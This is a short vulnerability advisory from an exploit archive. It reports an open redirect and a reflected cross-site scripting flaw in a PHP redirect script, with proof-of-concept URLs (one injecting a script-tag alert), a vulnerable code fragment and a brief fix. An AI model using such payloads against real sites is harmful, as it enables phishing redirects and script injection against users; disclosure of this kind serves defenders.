mr material redirect script multiple Vulnerability

2018.07.18

IRANIAN ETHICAL HACKERS (IR)

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

[+] Exploit Title ; mr material redirect script multiple Vulnerability

[+] Date : 2018-07-18

[+] Author : 0P3N3R From IRANIAN ETHICAL HACKERS

[+] Vendor Homepage : http://mrmaterial.ir

[+] Dork : ...

[+] My Site : http://4rtxtnk7o5yt3mfw.onion/

[+] Tested On : windows 10 - kali linux 2.0

[+] Contact : https://telegram.me/WebServer

[+] Description :

	[!]mr material redirect script

[+] Poc : 

	[!] Open Redirect : localhost/down/index.php?url=Your Link Here

	[!] XSS : http://localhost/down/index.php?url=http://google.com%22%3E%3Cscript%3Ealert(1)%3C/script%3E

[+] Type of vulnerability :

	[!] Xss -> Reflected 

[+] Vulnerable Source Code :

	[!] $redirecturl = $_GET['url'];
if (!empty ($redirecturl))
{

[+] Security Level :

	[!] medium

[+] Exploitation Technique:

	[!] Remote

[+] Request Method :

	[!] GET

[+] Vulnerability Files :

		[!] index.php

[+] Fix :

	[!] Restrict user input or replace bad characters

[+] We Are : [+] 0P3N3R [+] Ebrahim_Vaker

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

mr material redirect script multiple Vulnerability

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.